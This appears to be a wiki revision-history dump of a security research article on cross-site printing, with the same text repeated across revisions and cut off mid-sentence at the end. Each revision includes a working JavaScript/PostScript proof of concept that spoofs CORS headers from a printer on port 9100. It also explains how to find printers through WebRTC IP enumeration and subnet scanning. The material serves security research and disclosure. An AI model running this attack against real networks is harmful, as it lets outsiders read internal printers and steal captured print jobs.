[http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. <span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Bugzilla@Mozilla, 2017</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker, 2017</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- b0d6c108ae04ee3f24fd9ba03c824210a92ff5a4 611 315 2017-02-24T15:47:32Z Admin 1 Added port numbers wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- a282462671a49cb7dfd47823a55106d6f1d7642a 315 291 2017-01-31T08:33:14Z 84.153.135.37 0 /* Proof-of-concept */ wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || - || ✔ || ✔ || - |- | Web || ✔ || - || - || - |- | IPP || ✔ || - || ✔ || - |- | LPD || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- ca523076503d7ca27e1d1e6853e8a2b7d042df93 291 284 2017-01-30T13:01:33Z 134.147.202.176 0 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || - || ✔ || ✔ || - |- | Web || ✔ || - || - || - |- | IPP || ✔ || - || ✔ || - |- | LPD || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 692829d76c27b0d8bf32ada2e6833706372021b3 284 283 2017-01-28T17:26:42Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || - || ✔ || ✔ || - |- | Web || ✔ || - || - || - |- | IPP || ✔ || - || ✔ || - |- | LPD || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- d5a5c9022ed40cdca9275018c7490cd311d066b0 283 279 2017-01-28T17:25:54Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 